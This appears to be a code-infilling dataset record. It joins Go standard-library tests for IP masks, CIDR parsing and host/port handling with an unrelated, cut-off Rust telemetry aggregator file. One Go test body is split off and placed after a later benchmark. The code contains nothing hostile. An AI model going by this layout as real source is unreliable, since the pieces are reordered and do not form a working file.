{IPv4(192, 168, 1, 127), IPMask(ParseIP("255.255.255.192")), IPv4(192, 168, 1, 64)},
{IPv4(192, 168, 1, 127), IPMask(ParseIP("ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffe0")), IPv4(192, 168, 1, 96)},
{IPv4(192, 168, 1, 127), IPv4Mask(255, 0, 255, 0), IPv4(192, 0, 1, 0)},
{ParseIP("2001:db8::1"), IPMask(ParseIP("ffff:ff80::")), ParseIP("2001:d80::")},
{ParseIP("2001:db8::1"), IPMask(ParseIP("f0f0:0f0f::")), ParseIP("2000:d08::")},
}
func TestIPMask(t *testing.T) {
for _, tt := range ipMaskTests {
if out := tt.in.Mask(tt.mask); out == nil || !tt.out.Equal(out) {
t.Errorf("IP(%v).Mask(%v) = %v, want %v", tt.in, tt.mask, out, tt.out)
}
}
}
var ipMaskStringTests = []struct {
in IPMask
out string
}{
{IPv4Mask(255, 255, 255, 240), "fffffff0"},
{IPv4Mask(255, 0, 128, 0), "ff008000"},
{IPMask(ParseIP("ffff:ff80::")), "ffffff80000000000000000000000000"},
{IPMask(ParseIP("ef00:ff80::cafe:0")), "ef00ff800000000000000000cafe0000"},
{nil, "<nil>"},
}
func TestIPMaskString(t *testing.T) {
for _, tt := range ipMaskStringTests {
if out := tt.in.String(); out != tt.out {
t.Errorf("IPMask.String(%v) = %q, want %q", tt.in, out, tt.out)
}
}
}
func BenchmarkIPMaskString(b *testing.B) {
testHookUninstaller.Do(uninstallTestHooks)
for i := 0; i < b.N; i++ {
for _, tt := range ipMaskStringTests {
sink = tt.in.String()
}
}
}
var parseCIDRTests = []struct {
in string
ip IP
net *IPNet
err error
}{
{"135.104.0.0/32", IPv4(135, 104, 0, 0), &IPNet{IP: IPv4(135, 104, 0, 0), Mask: IPv4Mask(255, 255, 255, 255)}, nil},
{"0.0.0.0/24", IPv4(0, 0, 0, 0), &IPNet{IP: IPv4(0, 0, 0, 0), Mask: IPv4Mask(255, 255, 255, 0)}, nil},
{"135.104.0.0/24", IPv4(135, 104, 0, 0), &IPNet{IP: IPv4(135, 104, 0, 0), Mask: IPv4Mask(255, 255, 255, 0)}, nil},
{"135.104.0.1/32", IPv4(135, 104, 0, 1), &IPNet{IP: IPv4(135, 104, 0, 1), Mask: IPv4Mask(255, 255, 255, 255)}, nil},
{"135.104.0.1/24", IPv4(135, 104, 0, 1), &IPNet{IP: IPv4(135, 104, 0, 0), Mask: IPv4Mask(255, 255, 255, 0)}, nil},
{"::1/128", ParseIP("::1"), &IPNet{IP: ParseIP("::1"), Mask: IPMask(ParseIP("ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff"))}, nil},
{"abcd:2345::/127", ParseIP("abcd:2345::"), &IPNet{IP: ParseIP("abcd:2345::"), Mask: IPMask(ParseIP("ffff:ffff:ffff:ffff:ffff:ffff:ffff:fffe"))}, nil},
{"abcd:2345::/65", ParseIP("abcd:2345::"), &IPNet{IP: ParseIP("abcd:2345::"), Mask: IPMask(ParseIP("ffff:ffff:ffff:ffff:8000::"))}, nil},
{"abcd:2345::/64", ParseIP("abcd:2345::"), &IPNet{IP: ParseIP("abcd:2345::"), Mask: IPMask(ParseIP("ffff:ffff:ffff:ffff::"))}, nil},
{"abcd:2345::/63", ParseIP("abcd:2345::"), &IPNet{IP: ParseIP("abcd:2345::"), Mask: IPMask(ParseIP("ffff:ffff:ffff:fffe::"))}, nil},
{"abcd:2345::/33", ParseIP("abcd:2345::"), &IPNet{IP: ParseIP("abcd:2345::"), Mask: IPMask(ParseIP("ffff:ffff:8000::"))}, nil},
{"abcd:2345::/32", ParseIP("abcd:2345::"), &IPNet{IP: ParseIP("abcd:2345::"), Mask: IPMask(ParseIP("ffff:ffff::"))}, nil},
{"abcd:2344::/31", ParseIP("abcd:2344::"), &IPNet{IP: ParseIP("abcd:2344::"), Mask: IPMask(ParseIP("ffff:fffe::"))}, nil},
{"abcd:2300::/24", ParseIP("abcd:2300::"), &IPNet{IP: ParseIP("abcd:2300::"), Mask: IPMask(ParseIP("ffff:ff00::"))}, nil},
{"abcd:2345::/24", ParseIP("abcd:2345::"), &IPNet{IP: ParseIP("abcd:2300::"), Mask: IPMask(ParseIP("ffff:ff00::"))}, nil},
{"2001:DB8::/48", ParseIP("2001:DB8::"), &IPNet{IP: ParseIP("2001:DB8::"), Mask: IPMask(ParseIP("ffff:ffff:ffff::"))}, nil},
{"2001:DB8::1/48", ParseIP("2001:DB8::1"), &IPNet{IP: ParseIP("2001:DB8::"), Mask: IPMask(ParseIP("ffff:ffff:ffff::"))}, nil},
{"192.168.1.1/255.255.255.0", nil, nil, &ParseError{Type: "CIDR address", Text: "192.168.1.1/255.255.255.0"}},
{"192.168.1.1/35", nil, nil, &ParseError{Type: "CIDR address", Text: "192.168.1.1/35"}},
{"2001:db8::1/-1", nil, nil, &ParseError{Type: "CIDR address", Text: "2001:db8::1/-1"}},
{"2001:db8::1/-0", nil, nil, &ParseError{Type: "CIDR address", Text: "2001:db8::1/-0"}},
{"-0.0.0.0/32", nil, nil, &ParseError{Type: "CIDR address", Text: "-0.0.0.0/32"}},
{"0.-1.0.0/32", nil, nil, &ParseError{Type: "CIDR address", Text: "0.-1.0.0/32"}},
{"0.0.-2.0/32", nil, nil, &ParseError{Type: "CIDR address", Text: "0.0.-2.0/32"}},
{"0.0.0.-3/32", nil, nil, &ParseError{Type: "CIDR address", Text: "0.0.0.-3/32"}},
{"0.0.0.0/-0", nil, nil, &ParseError{Type: "CIDR address", Text: "0.0.0.0/-0"}},
{"", nil, nil, &ParseError{Type: "CIDR address", Text: ""}},
}
func TestParseCIDR(t *testing.T) {
for _, tt := range parseCIDRTests {
ip, net, err := ParseCIDR(tt.in)
if !reflect.DeepEqual(err, tt.err) {
t.Errorf("ParseCIDR(%q) = %v, %v; want %v, %v", tt.in, ip, net, tt.ip, tt.net)
}
if err == nil && (!tt.ip.Equal(ip) || !tt.net.IP.Equal(net.IP) || !reflect.DeepEqual(net.Mask, tt.net.Mask)) {
t.Errorf("ParseCIDR(%q) = %v, {%v, %v}; want %v, {%v, %v}", tt.in, ip, net.IP, net.Mask, tt.ip, tt.net.IP, tt.net.Mask)
}
}
}
var ipNetContainsTests = []struct {
ip IP
net *IPNet
ok bool
}{
{IPv4(172, 16, 1, 1), &IPNet{IP: IPv4(172, 16, 0, 0), Mask: CIDRMask(12, 32)}, true},
{IPv4(172, 24, 0, 1), &IPNet{IP: IPv4(172, 16, 0, 0), Mask: CIDRMask(13, 32)}, false},
{IPv4(192, 168, 0, 3), &IPNet{IP: IPv4(192, 168, 0, 0), Mask: IPv4Mask(0, 0, 255, 252)}, true},
{IPv4(192, 168, 0, 4), &IPNet{IP: IPv4(192, 168, 0, 0), Mask: IPv4Mask(0, 255, 0, 252)}, false},
{ParseIP("2001:db8:1:2::1"), &IPNet{IP: ParseIP("2001:db8:1::"), Mask: CIDRMask(47, 128)}, true},
{ParseIP("2001:db8:1:2::1"), &IPNet{IP: ParseIP("2001:db8:2::"), Mask: CIDRMask(47, 128)}, false},
{ParseIP("2001:db8:1:2::1"), &IPNet{IP: ParseIP("2001:db8:1::"), Mask: IPMask(ParseIP("ffff:0:ffff::"))}, true},
{ParseIP("2001:db8:1:2::1"), &IPNet{IP: ParseIP("2001:db8:1::"), Mask: IPMask(ParseIP("0:0:0:ffff::"))}, false},
}
func TestIPNetContains(t *testing.T) {
for _, tt := range ipNetContainsTests {
if ok := tt.net.Contains(tt.ip); ok != tt.ok {
t.Errorf("IPNet(%v).Contains(%v) = %v, want %v", tt.net, tt.ip, ok, tt.ok)
}
}
}
var ipNetStringTests = []struct {
in *IPNet
out string
}{
{&IPNet{IP: IPv4(192, 168, 1, 0), Mask: CIDRMask(26, 32)}, "192.168.1.0/26"},
{&IPNet{IP: IPv4(192, 168, 1, 0), Mask: IPv4Mask(255, 0, 255, 0)}, "192.168.1.0/ff00ff00"},
{&IPNet{IP: ParseIP("2001:db8::"), Mask: CIDRMask(55, 128)}, "2001:db8::/55"},
{&IPNet{IP: ParseIP("2001:db8::"), Mask: IPMask(ParseIP("8000:f123:0:cafe::"))}, "2001:db8::/8000f1230000cafe0000000000000000"},
}
func TestIPNetString(t *testing.T) {
for _, tt := range ipNetStringTests {
if out := tt.in.String(); out != tt.out {
t.Errorf("IPNet.String(%v) = %q, want %q", tt.in, out, tt.out)
}
}
}
var cidrMaskTests = []struct {
ones int
bits int
out IPMask
}{
{0, 32, IPv4Mask(0, 0, 0, 0)},
{12, 32, IPv4Mask(255, 240, 0, 0)},
{24, 32, IPv4Mask(255, 255, 255, 0)},
{32, 32, IPv4Mask(255, 255, 255, 255)},
{0, 128, IPMask{0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0}},
{4, 128, IPMask{0xf0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0}},
{48, 128, IPMask{0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0}},
{128, 128, IPMask{0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff}},
{33, 32, nil},
{32, 33, nil},
{-1, 128, nil},
{128, -1, nil},
}
func TestCIDRMask(t *testing.T) {
for _, tt := range cidrMaskTests {
if out := CIDRMask(tt.ones, tt.bits); !reflect.DeepEqual(out, tt.out) {
t.Errorf("CIDRMask(%v, %v) = %v, want %v", tt.ones, tt.bits, out, tt.out)
}
}
}
var (
v4addr = IP{192, 168, 0, 1}
v4mappedv6addr = IP{0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0xff, 0xff, 192, 168, 0, 1}
v6addr = IP{0x20, 0x1, 0xd, 0xb8, 0, 0, 0, 0, 0, 0, 0x1, 0x23, 0, 0x12, 0, 0x1}
v4mask = IPMask{255, 255, 255, 0}
v4mappedv6mask = IPMask{0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 255, 255, 255, 0}
v6mask = IPMask{0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0, 0, 0, 0, 0, 0, 0, 0}
badaddr = IP{192, 168, 0}
badmask = IPMask{255, 255, 0}
v4maskzero = IPMask{0, 0, 0, 0}
)
var networkNumberAndMaskTests = []struct {
in IPNet
out IPNet
}{
{IPNet{IP: v4addr, Mask: v4mask}, IPNet{IP: v4addr, Mask: v4mask}},
{IPNet{IP: v4addr, Mask: v4mappedv6mask}, IPNet{IP: v4addr, Mask: v4mask}},
{IPNet{IP: v4mappedv6addr, Mask: v4mappedv6mask}, IPNet{IP: v4addr, Mask: v4mask}},
{IPNet{IP: v4mappedv6addr, Mask: v6mask}, IPNet{IP: v4addr, Mask: v4maskzero}},
{IPNet{IP: v4addr, Mask: v6mask}, IPNet{IP: v4addr, Mask: v4maskzero}},
{IPNet{IP: v6addr, Mask: v6mask}, IPNet{IP: v6addr, Mask: v6mask}},
{IPNet{IP: v6addr, Mask: v4mappedv6mask}, IPNet{IP: v6addr, Mask: v4mappedv6mask}},
{in: IPNet{IP: v6addr, Mask: v4mask}},
{in: IPNet{IP: v4addr, Mask: badmask}},
{in: IPNet{IP: v4mappedv6addr, Mask: badmask}},
{in: IPNet{IP: v6addr, Mask: badmask}},
{in: IPNet{IP: badaddr, Mask: v4mask}},
{in: IPNet{IP: badaddr, Mask: v4mappedv6mask}},
{in: IPNet{IP: badaddr, Mask: v6mask}},
{in: IPNet{IP: badaddr, Mask: badmask}},
}
func TestNetworkNumberAndMask(t *testing.T) {
for _, tt := range networkNumberAndMaskTests {
ip, m := networkNumberAndMask(&tt.in)
out := &IPNet{IP: ip, Mask: m}
if !reflect.DeepEqual(&tt.out, out) {
t.Errorf("networkNumberAndMask(%v) = %v, want %v", tt.in, out, &tt.out)
}
}
}
var splitJoinTests = []struct {
host string
port string
join string
}{
{"www.google.com", "80", "www.google.com:80"},
{"127.0.0.1", "1234", "127.0.0.1:1234"},
{"::1", "80", "[::1]:80"},
{"fe80::1%lo0", "80", "[fe80::1%lo0]:80"},
{"localhost%lo0", "80", "[localhost%lo0]:80"},
{"", "0", ":0"},
{"google.com", "https%foo", "google.com:https%foo"}, // Go 1.0 behavior
{"127.0.0.1", "", "127.0.0.1:"}, // Go 1.0 behavior
{"www.google.com", "", "www.google.com:"}, // Go 1.0 behavior
}
var splitFailureTests = []struct {
hostPort string
err string
}{
{"www.google.com", "missing port in address"},
{"127.0.0.1", "missing port in address"},
{"[::1]", "missing port in address"},
{"[fe80::1%lo0]", "missing port in address"},
{"[localhost%lo0]", "missing port in address"},
{"localhost%lo0", "missing port in address"},
{"::1", "too many colons in address"},
{"fe80::1%lo0", "too many colons in address"},
{"fe80::1%lo0:80", "too many colons in address"},
{"localhost%lo0:80", "missing brackets in address"},
// Test cases that didn't fail in Go 1.0
{"[foo:bar]", "missing port in address"},
{"[foo:bar]baz", "missing port in address"},
{"[foo]bar:baz", "missing port in address"},
{"[foo]:[bar]:baz", "too many colons in address"},
{"[foo]:[bar]baz", "unexpected '[' in address"},
{"foo[bar]:baz", "unexpected '[' in address"},
{"foo]bar:baz", "unexpected ']' in address"},
}
func TestSplitHostPort(t *testing.T) {
for _, tt := range splitJoinTests {
if host, port, err := SplitHostPort(tt.join); host != tt.host || port != tt.port || err != nil {
t.Errorf("SplitHostPort(%q) = %q, %q, %v; want %q, %q, nil", tt.join, host, port, err, tt.host, tt.port)
}
}
for _, tt := range splitFailureTests {
if host, port, err := SplitHostPort(tt.hostPort); err == nil {
t.Errorf("SplitHostPort(%q) should have failed", tt.hostPort)
} else {
e := err.(*AddrError)
if e.Err != tt.err {
t.Errorf("SplitHostPort(%q) = _, _, %q; want %q", tt.hostPort, e.Err, tt.err)
}
if host != "" || port != "" {
t.Errorf("SplitHostPort(%q) = %q, %q, err; want %q, %q, err on failure", tt.hostPort, host, port, "", "")
}
}
}
}
func TestJoinHostPort(t *testing.T) {
for _, tt := range splitJoinTests {
if join := JoinHostPort(tt.host, tt.port); join != tt.join {
t.Errorf("JoinHostPort(%q, %q) = %q; want %q", tt.host, tt.port, join, tt.join)
}
}
}
var ipAddrFamilyTests = []struct {
in IP
af4 bool
af6 bool
}{
{IPv4bcast, true, false},
{IPv4allsys, true, false},
{IPv4allrouter, true, false},
{IPv4zero, true, false},
{IPv4(224, 0, 0, 1), true, false},
{IPv4(127, 0, 0, 1), true, false},
{IPv4(240, 0, 0, 1), true, false},
{IPv6unspecified, false, true},
{IPv6loopback, false, true},
{IPv6interfacelocalallnodes, false, true},
{IPv6linklocalallnodes, false, true},
{IPv6linklocalallrouters, false, true},
{ParseIP("ff05::a:b:c:d"), false, true},
{ParseIP("fe80::1:2:3:4"), false, true},
{ParseIP("2001:db8::123:12:1"), false, true},
}
func TestIPAddrFamily(t *testing.T) {
for _, tt := range ipAddrFamilyTests {
if af := tt.in.To4() != nil; af != tt.af4 {
t.Errorf("verifying IPv4 address family for %q = %v, want %v", tt.in, af, tt.af4)
}
if af := len(tt.in) == IPv6len && tt.in.To4() == nil; af != tt.af6 {
t.Errorf("verifying IPv6 address family for %q = %v, want %v", tt.in, af, tt.af6)
}
}
}
var ipAddrScopeTests = []struct {
scope func(IP) bool
in IP
ok bool
}{
{IP.IsUnspecified, IPv4zero, true},
{IP.IsUnspecified, IPv4(127, 0, 0, 1), false},
{IP.IsUnspecified, IPv6unspecified, true},
{IP.IsUnspecified, IPv6interfacelocalallnodes, false},
{IP.IsUnspecified, nil, false},
{IP.IsLoopback, IPv4(127, 0, 0, 1), true},
{IP.IsLoopback, IPv4(127, 255, 255, 254), true},
{IP.IsLoopback, IPv4(128, 1, 2, 3), false},
{IP.IsLoopback, IPv6loopback, true},
{IP.IsLoopback, IPv6linklocalallrouters, false},
{IP.IsLoopback, nil, false},
{IP.IsMulticast, IPv4(224, 0, 0, 0), true},
{IP.IsMulticast, IPv4(239, 0, 0, 0), true},
{IP.IsMulticast, IPv4(240, 0, 0, 0), false},
{IP.IsMulticast, IPv6linklocalallnodes, true},
{IP.IsMulticast, IP{0xff, 0x05, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0}, true},
{IP.IsMulticast, IP{0xfe, 0x80, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0}, false},
{IP.IsMulticast, nil, false},
{IP.IsInterfaceLocalMulticast, IPv4(224, 0, 0, 0), false},
{IP.IsInterfaceLocalMulticast, IPv4(0xff, 0x01, 0, 0), false},
{IP.IsInterfaceLocalMulticast, IPv6interfacelocalallnodes, true},
{IP.IsInterfaceLocalMulticast, nil, false},
{IP.IsLinkLocalMulticast, IPv4(224, 0, 0, 0), true},
{IP.IsLinkLocalMulticast, IPv4(239, 0, 0, 0), false},
{IP.IsLinkLocalMulticast, IPv4(0xff, 0x02, 0, 0), false},
{IP.IsLinkLocalMulticast, IPv6linklocalallrouters, true},
{IP.IsLinkLocalMulticast, IP{0xff, 0x05, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0}, false},
{IP.IsLinkLocalMulticast, nil, false},
{IP.IsLinkLocalUnicast, IPv4(169, 254, 0, 0), true},
{IP.IsLinkLocalUnicast, IPv4(169, 255, 0, 0), false},
{IP.IsLinkLocalUnicast, IPv4(0xfe, 0x80, 0, 0), false},
{IP.IsLinkLocalUnicast, IP{0xfe, 0x80, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0}, true},
{IP.IsLinkLocalUnicast, IP{0xfe, 0xc0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0}, false},
{IP.IsLinkLocalUnicast, nil, false},
{IP.IsGlobalUnicast, IPv4(240, 0, 0, 0), true},
{IP.IsGlobalUnicast, IPv4(232, 0, 0, 0), false},
{IP.IsGlobalUnicast, IPv4(169, 254, 0, 0), false},
{IP.IsGlobalUnicast, IPv4bcast, false},
{IP.IsGlobalUnicast, IP{0x20, 0x1, 0xd, 0xb8, 0, 0, 0, 0, 0, 0, 0x1, 0x23, 0, 0x12, 0, 0x1}, true},
{IP.IsGlobalUnicast, IP{0xfe, 0x80, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0}, false},
{IP.IsGlobalUnicast, IP{0xff, 0x05, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0}, false},
{IP.IsGlobalUnicast, nil, false},
}
func name(f interface{}) string {
return runtime.FuncForPC(reflect.ValueOf(f).Pointer()).Name()
}
func TestIPAddrScope(t *testing.T) |
func BenchmarkIPEqual(b *testing.B) {
b.Run("IPv4", func(b *testing.B) {
benchmarkIPEqual(b, IPv4len)
})
b.Run("IPv6", func(b *testing.B) {
benchmarkIPEqual(b, IPv6len)
})
}
func benchmarkIPEqual(b *testing.B, size int) {
ips := make([]IP, 1000)
for i := range ips {
ips[i] = make(IP, size)
rand.Read(ips[i])
}
// Half of the N are equal.
for i := 0; i < b.N/2; i++ {
x := ips[i%len(ips)]
y := ips[i%len(ips)]
x.Equal(y)
}
// The other half are not equal.
for i := 0; i < b.N/2; i++ {
x := ips[i%len(ips)]
y := ips[(i+1)%len(ips)]
x.Equal(y)
}
}
| {
for _, tt := range ipAddrScopeTests {
if ok := tt.scope(tt.in); ok != tt.ok {
t.Errorf("%s(%q) = %v, want %v", name(tt.scope), tt.in, ok, tt.ok)
}
ip := tt.in.To4()
if ip == nil {
continue
}
if ok := tt.scope(ip); ok != tt.ok {
t.Errorf("%s(%q) = %v, want %v", name(tt.scope), ip, ok, tt.ok)
}
}
} |
mod.rs | use super::{AttributeUpdate, AttributeUpdateOp, Command, Event, WakeOp, Watch};
use crate::{record::Recorder, WatchRequest};
use console_api as proto;
use proto::resources::resource;
use proto::resources::stats::Attribute;
use tokio::sync::{mpsc, Notify};
use futures::FutureExt;
use std::{
collections::{hash_map::Entry, HashMap, HashSet},
convert::TryInto,
sync::{
atomic::{AtomicBool, Ordering::*},
Arc,
},
time::{Duration, SystemTime},
};
use tracing_core::{span, Metadata};
use hdrhistogram::{
serialization::{Serializer, V2SerializeError, V2Serializer},
Histogram,
};
pub type Id = u64;
mod id_data;
mod shrink;
use self::id_data::{IdData, Include};
use self::shrink::{ShrinkMap, ShrinkVec};
pub(crate) struct Aggregator {
/// Channel of incoming events emitted by `TaskLayer`s.
events: mpsc::Receiver<Event>,
/// New incoming RPCs.
rpcs: mpsc::Receiver<Command>,
/// The interval at which new data updates are pushed to clients.
publish_interval: Duration,
/// How long to keep task data after a task has completed.
retention: Duration,
/// Triggers a flush when the event buffer is approaching capacity.
flush_capacity: Arc<Flush>,
/// Currently active RPCs streaming task events.
watchers: ShrinkVec<Watch<proto::instrument::Update>>,
/// Currently active RPCs streaming task details events, by task ID.
details_watchers: ShrinkMap<Id, Vec<Watch<proto::tasks::TaskDetails>>>,
/// *All* metadata for task spans and user-defined spans that we care about.
///
/// This is sent to new clients as part of the initial state.
all_metadata: ShrinkVec<proto::register_metadata::NewMetadata>,
/// *New* metadata that was registered since the last state update.
///
/// This is emptied on every state update.
new_metadata: Vec<proto::register_metadata::NewMetadata>,
/// Map of task IDs to task static data.
tasks: IdData<Task>,
/// Map of task IDs to task stats.
task_stats: IdData<TaskStats>,
/// Map of resource IDs to resource static data.
resources: IdData<Resource>,
/// Map of resource IDs to resource stats.
resource_stats: IdData<ResourceStats>,
/// Map of AsyncOp IDs to AsyncOp static data.
async_ops: IdData<AsyncOp>,
/// Map of AsyncOp IDs to AsyncOp stats.
async_op_stats: IdData<AsyncOpStats>,
/// *All* PollOp events for AsyncOps on Resources.
///
/// This is sent to new clients as part of the initial state.
// TODO: drop the poll ops for async ops that have been dropped
all_poll_ops: ShrinkVec<proto::resources::PollOp>,
/// *New* PollOp events that whave occurred since the last update
///
/// This is emptied on every state update.
new_poll_ops: Vec<proto::resources::PollOp>,
ids: Ids,
/// A sink to record all events to a file.
recorder: Option<Recorder>,
/// The time "state" of the aggregator, such as paused or live.
temporality: Temporality,
}
#[derive(Debug)]
pub(crate) struct Flush {
pub(crate) should_flush: Notify,
triggered: AtomicBool,
}
// An entity (e.g Task, Resource) that at some point in
// time can be dropped. This generally refers to spans that
// have been closed indicating that a task, async op or a
// resource is not in use anymore
pub(crate) trait DroppedAt {
fn dropped_at(&self) -> Option<SystemTime>;
}
pub(crate) trait ToProto {
type Output;
fn to_proto(&self) -> Self::Output;
}
#[derive(Debug, Default)]
pub(crate) struct Ids {
/// A counter for the pretty task IDs.
next: Id,
/// A table that contains the span ID to pretty ID mappings.
id_mappings: ShrinkMap<span::Id, Id>,
}
#[derive(Debug)]
enum Temporality {
Live,
Paused,
}
#[derive(Default)]
struct PollStats {
/// The number of polls in progress
current_polls: u64,
/// The total number of polls
polls: u64,
first_poll: Option<SystemTime>,
last_poll_started: Option<SystemTime>,
last_poll_ended: Option<SystemTime>,
busy_time: Duration,
}
// Represent static data for resources
struct Resource {
id: Id,
metadata: &'static Metadata<'static>,
concrete_type: String,
kind: resource::Kind,
location: Option<proto::Location>,
}
/// Represents a key for a `proto::field::Name`. Because the
/// proto::field::Name might not be unique we also include the
/// resource id in this key
#[derive(Hash, PartialEq, Eq)]
struct FieldKey {
resource_id: u64,
field_name: proto::field::Name,
}
#[derive(Default)]
struct ResourceStats {
created_at: Option<SystemTime>,
dropped_at: Option<SystemTime>,
attributes: HashMap<FieldKey, Attribute>,
}
/// Represents static data for tasks
struct Task {
id: Id,
metadata: &'static Metadata<'static>,
fields: Vec<proto::Field>,
location: Option<proto::Location>,
}
struct TaskStats {
// task stats
created_at: Option<SystemTime>,
dropped_at: Option<SystemTime>,
// waker stats
wakes: u64,
waker_clones: u64,
waker_drops: u64,
self_wakes: u64,
last_wake: Option<SystemTime>,
poll_times_histogram: Histogram<u64>,
poll_stats: PollStats,
}
struct AsyncOp {
id: Id,
metadata: &'static Metadata<'static>,
source: String,
}
#[derive(Default)]
struct AsyncOpStats {
created_at: Option<SystemTime>,
dropped_at: Option<SystemTime>,
resource_id: Option<Id>,
task_id: Option<Id>,
poll_stats: PollStats,
}
impl DroppedAt for ResourceStats {
fn dropped_at(&self) -> Option<SystemTime> |
}
impl DroppedAt for TaskStats {
fn dropped_at(&self) -> Option<SystemTime> {
self.dropped_at
}
}
impl DroppedAt for AsyncOpStats {
fn dropped_at(&self) -> Option<SystemTime> {
self.dropped_at
}
}
impl PollStats {
fn update_on_span_enter(&mut self, timestamp: SystemTime) {
if self.current_polls == 0 {
self.last_poll_started = Some(timestamp);
if self.first_poll == None {
self.first_poll = Some(timestamp);
}
self.polls += 1;
}
self.current_polls += 1;
}
fn update_on_span_exit(&mut self, timestamp: SystemTime) {
self.current_polls -= 1;
if self.current_polls == 0 {
if let Some(last_poll_started) = self.last_poll_started {
let elapsed = timestamp.duration_since(last_poll_started).unwrap();
self.last_poll_ended = Some(timestamp);
self.busy_time += elapsed;
}
}
}
fn since_last_poll(&self, timestamp: SystemTime) -> Option<Duration> {
self.last_poll_started
.map(|lps| timestamp.duration_since(lps).unwrap())
}
}
impl Default for TaskStats {
fn default() -> Self {
TaskStats {
created_at: None,
dropped_at: None,
wakes: 0,
waker_clones: 0,
waker_drops: 0,
self_wakes: 0,
last_wake: None,
// significant figures should be in the [0-5] range and memory usage
// grows exponentially with higher a sigfig
poll_times_histogram: Histogram::<u64>::new(2).unwrap(),
poll_stats: PollStats::default(),
}
}
}
impl Aggregator {
pub(crate) fn new(
events: mpsc::Receiver<Event>,
rpcs: mpsc::Receiver<Command>,
builder: &crate::Builder,
) -> Self {
Self {
flush_capacity: Arc::new(Flush {
should_flush: Notify::new(),
triggered: AtomicBool::new(false),
}),
rpcs,
publish_interval: builder.publish_interval,
retention: builder.retention,
events,
watchers: Default::default(),
details_watchers: Default::default(),
all_metadata: Default::default(),
new_metadata: Default::default(),
tasks: IdData::default(),
task_stats: IdData::default(),
resources: IdData::default(),
resource_stats: IdData::default(),
async_ops: IdData::default(),
async_op_stats: IdData::default(),
all_poll_ops: Default::default(),
new_poll_ops: Default::default(),
ids: Ids::default(),
recorder: builder
.recording_path
.as_ref()
.map(|path| Recorder::new(path).expect("creating recorder")),
temporality: Temporality::Live,
}
}
pub(crate) fn flush(&self) -> &Arc<Flush> {
&self.flush_capacity
}
pub(crate) async fn run(mut self) {
let mut publish = tokio::time::interval(self.publish_interval);
loop {
let should_send = tokio::select! {
// if the flush interval elapses, flush data to the client
_ = publish.tick() => {
match self.temporality {
Temporality::Live => true,
Temporality::Paused => false,
}
}
// triggered when the event buffer is approaching capacity
_ = self.flush_capacity.should_flush.notified() => {
tracing::debug!("approaching capacity; draining buffer");
false
}
// a new command from a client
cmd = self.rpcs.recv() => {
match cmd {
Some(Command::Instrument(subscription)) => {
self.add_instrument_subscription(subscription);
},
Some(Command::WatchTaskDetail(watch_request)) => {
self.add_task_detail_subscription(watch_request);
},
Some(Command::Pause) => {
self.temporality = Temporality::Paused;
}
Some(Command::Resume) => {
self.temporality = Temporality::Live;
}
None => {
tracing::debug!("rpc channel closed, terminating");
return;
}
};
false
}
};
// drain and aggregate buffered events.
//
// Note: we *don't* want to actually await the call to `recv` --- we
// don't want the aggregator task to be woken on every event,
// because it will then be woken when its own `poll` calls are
// exited. that would result in a busy-loop. instead, we only want
// to be woken when the flush interval has elapsed, or when the
// channel is almost full.
let mut drained = false;
while let Some(event) = self.events.recv().now_or_never() {
match event {
Some(event) => {
// always be recording...
if let Some(ref recorder) = self.recorder {
recorder.record(&event);
}
self.update_state(event);
drained = true;
}
// The channel closed, no more events will be emitted...time
// to stop aggregating.
None => {
tracing::debug!("event channel closed; terminating");
return;
}
};
}
// flush data to clients, if there are any currently subscribed
// watchers and we should send a new update.
if !self.watchers.is_empty() && should_send {
self.publish();
}
self.cleanup_closed();
if drained {
self.flush_capacity.has_flushed();
}
}
}
fn cleanup_closed(&mut self) {
// drop all closed have that has completed *and* whose final data has already
// been sent off.
let now = SystemTime::now();
let has_watchers = !self.watchers.is_empty();
self.tasks.drop_closed(
&mut self.task_stats,
now,
self.retention,
has_watchers,
&mut self.ids,
);
self.resources.drop_closed(
&mut self.resource_stats,
now,
self.retention,
has_watchers,
&mut self.ids,
);
self.async_ops.drop_closed(
&mut self.async_op_stats,
now,
self.retention,
has_watchers,
&mut self.ids,
);
}
/// Add the task subscription to the watchers after sending the first update
fn add_instrument_subscription(&mut self, subscription: Watch<proto::instrument::Update>) {
tracing::debug!("new instrument subscription");
let now = SystemTime::now();
// Send the initial state --- if this fails, the subscription is already dead
let update = &proto::instrument::Update {
task_update: Some(proto::tasks::TaskUpdate {
new_tasks: self
.tasks
.all()
.map(|(_, value)| value.to_proto())
.collect(),
stats_update: self.task_stats.as_proto(Include::All),
}),
resource_update: Some(proto::resources::ResourceUpdate {
new_resources: self
.resources
.all()
.map(|(_, value)| value.to_proto())
.collect(),
stats_update: self.resource_stats.as_proto(Include::All),
new_poll_ops: (*self.all_poll_ops).clone(),
}),
async_op_update: Some(proto::async_ops::AsyncOpUpdate {
new_async_ops: self
.async_ops
.all()
.map(|(_, value)| value.to_proto())
.collect(),
stats_update: self.async_op_stats.as_proto(Include::All),
}),
now: Some(now.into()),
new_metadata: Some(proto::RegisterMetadata {
metadata: (*self.all_metadata).clone(),
}),
};
if subscription.update(update) {
self.watchers.push(subscription)
}
}
/// Add the task details subscription to the watchers after sending the first update,
/// if the task is found.
fn add_task_detail_subscription(
&mut self,
watch_request: WatchRequest<proto::tasks::TaskDetails>,
) {
let WatchRequest {
id,
stream_sender,
buffer,
} = watch_request;
